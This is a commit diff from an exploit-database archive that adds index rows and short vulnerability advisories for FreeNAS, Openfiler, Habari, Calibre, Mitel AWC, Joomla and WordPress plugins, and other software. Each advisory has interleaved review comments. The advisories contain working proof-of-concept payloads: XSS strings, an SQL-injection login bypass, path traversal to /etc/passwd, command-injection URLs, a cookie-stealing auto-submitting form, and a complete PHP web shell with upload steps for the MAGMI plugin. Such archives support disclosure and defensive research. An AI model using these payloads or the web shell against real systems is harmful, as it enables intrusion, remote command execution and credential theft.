Updated 11_02_2014
This commit is contained in:
parent
9234afd706
commit
46921ae8d6
13 changed files with 200 additions and 37 deletions
11
files.csv
|
@ -31639,3 +31639,14 @@ id,file,description,date,author,platform,type,port
|
|||
35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection Vulnerability",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection Vulnerability",2010-12-20,"DeadLy DeMon",php,webapps,0
|
||||
35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0
|
||||
35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0
|
||||
35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
|
||||
35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 Cross Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0
|
||||
35131,platforms/php/webapps/35131.txt,"Social Share 'username' Parameter SQL Injection Vulnerability",2010-12-21,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35132,platforms/linux/remote/35132.txt,"Mitel Audio and Web Conferencing (AWC) Remote Arbitrary Shell Command Injection Vulnerability",2010-12-21,"Jan Fry",linux,remote,0
|
||||
35133,platforms/php/webapps/35133.txt,"Mediatricks Viva Thumbs Plugin for WordPress Multiple Information Disclosure Vulnerabilities",2010-12-21,"Richard Brain",php,webapps,0
|
||||
35134,platforms/php/webapps/35134.txt,"ImpressCMS 1.2.x 'quicksearch_ContentContent' Parameter HTML Injection Vulnerability",2010-12-21,"High-Tech Bridge SA",php,webapps,0
|
||||
35135,platforms/php/webapps/35135.txt,"Classified Component for Joomla! SQL Injection Vulnerability",2010-12-22,R4dc0re,php,webapps,0
|
||||
35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 'email' Parameter Cross Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0
|
||||
35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
|
|
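Review bot: the date in the last added row, `35137,...,2010-12-10`, breaks the ascending date order of this block (2010-12-17 through 2010-12-22) and is earlier than the other two Social Share entries by the same author (35121 dated 2010-12-17, 35122 dated 2010-12-20); worth checking against the source advisory before merging. The 35123 title "Mafya Oyun Scrpti" also looks like a typo for "Scripti", unless that is how the original advisory spells it.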
|
8
platforms/linux/remote/35132.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/45537/info
|
||||
|
||||
Mitel Audio and Web Conferencing (AWC) is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
|
||||
|
||||
Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.
|
||||
|
||||
http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/usr/awc/www/users%22%26
|
||||
http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%20%22/usr/awc/www/cgi-bin/%22%26
|
|
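Review bot: this advisory lacks the affected-version line that the other files in this commit carry (e.g. "FreeNAS 0.7.2.5543 is vulnerable; other versions may also be affected"), so a reader cannot tell which Mitel AWC releases are affected; add it from the source BID if it is available. It would also help to state in the text that the injection point is the `xsl` parameter of `/awcuser/cgi-bin/vcs`, since the two proof URLs are the only place that is shown, and that the remedy is to restrict that parameter to a fixed set of stylesheet names rather than to pass it to a shell.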
@ -1,48 +1,58 @@
|
|||
Exploit found date: 10/24/2014
|
||||
Security Researcher name: Parvinder Singh Bhasin
|
||||
Security Researcher name: Parvinder Bhasin
|
||||
Contact info: parvinder.bhasin@gmail.com
|
||||
twitter: @parvinderb <scorpio>
|
||||
|
||||
twitter: @parvinderb - scorpio
|
||||
|
||||
Currently tested version:
|
||||
Magento version: Magento CE - 1.8 and newer versions
|
||||
MAGMI version: v0.7.17a and greater
|
||||
Magento version: Magento CE - 1.8 older
|
||||
MAGMI version: v0.7.17a older
|
||||
|
||||
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server.
|
||||
Download software link:
|
||||
Magento server: http://www.magentocommerce.com/download
|
||||
MAGMI Plugin:
|
||||
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/
|
||||
|
||||
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability
|
||||
(RFI) which allows an attacker to upload essentially any PHP file (without
|
||||
any sanity checks). This PHP file could then be used to skim credit card
|
||||
data, rewrite files, run remote commands, delete files..etc. Essentially,
|
||||
this gives attacker ability to execute remote commands on the vulnerable
|
||||
server.
|
||||
|
||||
Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's paid/unpaid customers of this vulnerability. I would appreciate if my name appears as part of the disclosure.
|
||||
|
||||
Steps to reproduce:
|
||||
|
||||
1. http://<a magentosite.com>/magmi/web/magmi.php
|
||||
2. Under upload new plugins:
|
||||
click on "choose file"
|
||||
MAGento plugins are basically php file zipped. So create a php shell and zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file has been uploaded, it will say: Plugin packaged installed.
|
||||
|
||||
evil.php:
|
||||
|
||||
<?php
|
||||
if (isset($_POST['command'])){
|
||||
echo "<form action='evil.php' method='post'>
|
||||
<input type='text' name='command' value=''/>
|
||||
<input type='submit' value='execute'/>
|
||||
</form>";
|
||||
|
||||
if(function_exists('shell_exec')) {
|
||||
$command=$_POST['command'];
|
||||
$output = shell_exec("$command");
|
||||
echo "<pre>$output</pre>";
|
||||
}
|
||||
}
|
||||
else {
|
||||
echo "<form action='evil.php' method='post'>
|
||||
<input type='text' name='command' value=''/>
|
||||
<input type='submit' value='execute'/>
|
||||
</form>";
|
||||
}
|
||||
?>
|
||||
|
||||
3. Your malicious evil.php file is extracted now. All you then need to do is just access the evil.php page from:
|
||||
http://<amagentosite.com>/magmi/plugins/evil.php
|
||||
|
||||
At this point you could really have access to the entire system. Download any malware, install rootkits, skim credit card data ..etc.etc.
|
||||
click on "choose file"
|
||||
MAGento plugins are basically php file zipped. So create a php shell and
|
||||
zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file
|
||||
has been uploaded, it will say: Plugin packaged installed.
|
||||
evil.php:
|
||||
|
||||
<?php
|
||||
if (isset($_POST['command'])){
|
||||
echo "<form action='evil.php' method='post'>
|
||||
<input type='text' name='command' value=''/>
|
||||
<input type='submit' value='execute'/>
|
||||
</form>";
|
||||
|
||||
if(function_exists('shell_exec')) {
|
||||
$command=$_POST['command'];
|
||||
$output = shell_exec("$command");
|
||||
echo "<pre>$output</pre>";
|
||||
}
|
||||
}
|
||||
else {
|
||||
echo "<form action='evil.php' method='post'>
|
||||
<input type='text' name='command' value=''/>
|
||||
<input type='submit' value='execute'/>
|
||||
</form>";
|
||||
}
|
||||
?>
|
||||
|
||||
3. Your malicious evil.php file is extracted now. All you then need to do
|
||||
is just access the evil.php page from:
|
||||
http://<amagentosite.com>/magmi/plugins/evil.php
|
||||
At this point you could really have access to the entire system. Download
|
||||
any malware, install rootkits, skim credit card data ..etc.etc.
|
||||
|
|
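Review bot: the rewrap of this file changes the meaning of the affected-version lines: "Magento CE - 1.8 and newer versions" and "v0.7.17a and greater" become "Magento CE - 1.8 older" and "v0.7.17a older", which both reverses the range and drops the "and" (is "1.8 and older" meant?). Confirm which direction is correct and spell it out, because the two readings describe disjoint sets of installations. The researcher name also differs between the two versions ("Parvinder Singh Bhasin" vs "Parvinder Bhasin"); the header should settle on one form.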
12
platforms/php/webapps/35124.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/45522/info
|
||||
|
||||
FreeNAS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
FreeNAS 0.7.2.5543 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
||||
|
||||
|
||||
http://www.example.com/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes
|
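Review bot: the description names only FreeNAS, but both proof URLs target `/quixplorer/index.php`, i.e. the bundled QuiXplorer file manager, and use two different parameters (`lang` in the first, `order` in the second); stating the affected component and the parameters in the text would let an administrator check whether their install exposes that path at all.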
7
platforms/php/webapps/35125.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45523/info
|
||||
|
||||
Openfiler is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/admin/system.html?step=2&device=et%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Ebh0
|
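Review bot: the proof URL targets `/admin/system.html` with the `device` parameter, but the text does not say whether that page is reachable without an authenticated admin session; that distinction changes the severity considerably and should be stated, as should the affected Openfiler version, which is missing here although most other advisories in this commit give one.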
10
platforms/php/webapps/35126.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/45530/info
|
||||
|
||||
Habari is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Habari 0.6.5 is affected; other versions may be vulnerable as well.
|
||||
|
||||
http://www.example.com/system/admin/dash_status.php?status_data[1]=<script>alert('XSS');</script>
|
||||
http://www.example.com/system/admin/dash_additem.php?additem_form=<script>alert('XSS');</script>
|
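Review bot: both proof URLs for `dash_status.php` and `dash_additem.php` carry the payload unencoded (`<script>alert('XSS');</script>`), unlike the other advisories in this commit, which URL-encode it; either form works as documentation, but the file should say whether these dashboard endpoints require a logged-in session, since the `/system/admin/` path suggests they do.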
11
platforms/php/webapps/35131.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/45536/info
|
||||
|
||||
Social Share is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
The following example input is available:
|
||||
|
||||
Username: anytext' or verified=1#
|
||||
|
||||
Password: arbitrary_text
|
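Review bot: the advisory never says which form the `Username`/`Password` example input belongs to; since `anytext' or verified=1#` reads as a login bypass, state that it is the login form, and note that the fix is a parameterised query for the username lookup rather than escaping.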
16
platforms/php/webapps/35133.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/45539/info
|
||||
|
||||
The Mediatricks Viva Thumbs plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Attackers can exploit these issues using directory-traversal strings to confirm the existence of local files outside of the WordPress webroot. Information obtained can aid in launching further attacks.
|
||||
|
||||
http://www.example.com/show_image_NpAdvCatPG.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
|
||||
http://www.example.com/show_image_NpAdvHover.php?cache=false&cat=0&filename=/../../../../../../etc/passwd
|
||||
http://www.example.com/show_image_NpAdvInnerSmall.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvMainFea.php?cache=false&cat=1&filename=/../../../../../../etc/passwd
|
||||
http://www.example.com/show_image_NpAdvMainPGThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvSideFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
||||
http://www.example.com/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts
|
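Review bot: the text says attackers can "confirm the existence of local files", but the ten `show_image_*.php` scripts take the path in `filename=` and are named as image-serving scripts, so it should be stated whether they return the file contents or only an error that differs by existence; that is the difference between an information disclosure and an arbitrary file read. The ten URLs are also identical apart from the script name, so listing the scripts once with the common `?cache=false&cat=1&filename=` pattern would read more clearly.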
17
platforms/php/webapps/35134.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/45541/info
|
||||
|
||||
ImpressCMS is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
ImpressCMS 1.2.3 Final is vulnerable; other versions may also be affected.
|
||||
|
||||
<form action="http://www.example.com/modules/content/admin/content.php" method="post" name="main">
|
||||
<input type="hidden" name="quicksearch_ContentContent" value='search"><script>alert(document.cookie)</script>'>
|
||||
<input type="hidden" name="button_quicksearch_ContentContent" value="Search">
|
||||
<input type="hidden" name="filtersel" value="default">
|
||||
<input type="hidden" name="limitsel" value="15">
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
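Review bot: the proof-of-concept is an auto-submitting POST form (`document.main.submit()`) to `/modules/content/admin/content.php`, so it only fires when a logged-in administrator loads the attacker's page; the text should say so, and the fix needs both output encoding of `quicksearch_ContentContent` and an anti-CSRF token on that admin form, since the form shown submits without any token.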
7
platforms/php/webapps/35135.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45545/info
|
||||
|
||||
The Classified component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/classified-demo/index.php?option=com_classified&view=ads&name=[SQLi]
|
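Review bot: the single proof URL uses the placeholder `[SQLi]` for the `name` parameter and the file gives no affected version, so nothing here lets a reader tell whether a given Classified release is affected; add the affected component version range from the source BID.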
10
platforms/php/webapps/35136.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/45548/info
|
||||
|
||||
The Accept Signups Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Accept Signups 0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72,
|
||||
101, 108, 108, 111, 32, 58, 68, 32))</script>
|
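Review bot: the proof URL is split across two lines inside the `String.fromCharCode(72,` argument list, so copying it from the file yields a broken URL; keep it on one line, or note that the wrap is cosmetic.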
13
platforms/php/webapps/35137.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/45550/info
|
||||
|
||||
Social Share is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust.
|
||||
|
||||
The following example input is available:
|
||||
|
||||
Vulnerable code: $referrer = $_SERVER[HTTP_REFERER]; header("Location: $referrer");
|
||||
|
||||
HTTP query ("Referer" field):
|
||||
|
||||
Referer: http://www.example.com/\r\n[second new response]
|
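Review bot: the quoted vulnerable code uses an unquoted array key, `$_SERVER[HTTP_REFERER]`, where the application almost certainly reads `$_SERVER['HTTP_REFERER']`; check the transcription. The remedy the text does not mention is to validate the referrer against the site's own host (or not to redirect on it at all) rather than merely stripping CR/LF, since the root cause is using an attacker-controlled header as the redirect target.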
31
platforms/windows/remote/35130.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
source: http://www.securityfocus.com/bid/45532/info
|
||||
|
||||
Calibre is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information may aid in launching further attacks.
|
||||
|
||||
Calibre 0.7.34 is vulnerable; other versions may also be affected.
|
||||
|
||||
<?php
|
||||
error_reporting(E_ALL);
|
||||
$url = "http://www.example.com/static/../jquery.simulate.js";
|
||||
$ch = curl_init();
|
||||
curl_setopt($ch, CURLOPT_URL, $url);
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$resp = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
echo $resp;
|
||||
?>
|
||||
|
||||
<?php
|
||||
error_reporting(E_ALL);
|
||||
$url = "http://www.example.com/static/../../../../windows/win.ini.";
|
||||
$ch = curl_init();
|
||||
curl_setopt($ch, CURLOPT_URL, $url);
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$resp = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
echo $resp;
|
||||
?>
|
||||
|
||||
http://www.example.com/browse/search?query=<script>alert('waraxe')</script>
|
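Review bot: the second traversal URL ends in `win.ini.`, with a trailing dot after the filename; if that is deliberate it should be said so, otherwise it reads as a typo. The two PHP scripts are identical apart from `$url`, so a single script with the two URLs (or just the two URLs, as the other advisories in this commit do) would be clearer, and the `query` payload in the final XSS URL is unencoded while the traversal URLs are plain, so say which form is intended.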